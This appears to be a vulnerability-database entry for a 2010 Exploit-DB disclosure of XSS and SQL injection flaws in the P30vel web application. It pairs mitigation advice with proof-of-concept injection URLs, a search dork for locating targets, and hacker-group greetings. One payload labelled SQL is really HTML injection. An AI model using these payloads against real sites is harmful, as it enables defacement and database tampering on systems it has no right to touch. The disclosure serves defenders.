XSS/SQL Vulnerability in P30vel

vendor:

P30vel

by:

indoushka

8,8

CVSS

HIGH

Cross-site Scripting (XSS) and SQL Injection

79, 89

CWE

Product Name: P30vel

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

XSS/SQL Vulnerability in P30vel

A Cross-site Scripting (XSS) and SQL Injection vulnerability was discovered in P30vel. An attacker can inject malicious code into the vulnerable application to execute arbitrary HTML and script code in the context of the affected site, or to access, modify and delete data in the back-end database.

Mitigation:

Input validation should be used to prevent the execution of malicious code. Parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

######################################################################## 

# Vendor: http://www.p30vel.ir/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : indoushka@hotmail.com 

# Home : 

# Bug  : (XSS/SQL)

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : Copyright 2010. Software Index       
                                                                 
# Exploit By indoushka 

( XSS / HTML Inject ) :

http://127.0.0.1/PishBini/login.php/>"><marquee><font%20color=gren%20size=30>EL-KAHINA My Sister</font></marquee>

( XSS ) :

http://127.0.0.1/PishBini/admin/index.php?>"'><ScRiPt>alert(213771818860)</ScRiPt>

( SQL ) :

http://127.0.0.1/PishBini/index.php?forms=<marquee><font%20color=gren%20size=30>EL-KAHINA</font></marquee>

( Blind SQL/XPath injection) :

http://127.0.0.1:80/PishBini/winners.php?gid=170+and+31337-31337=0+--+

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------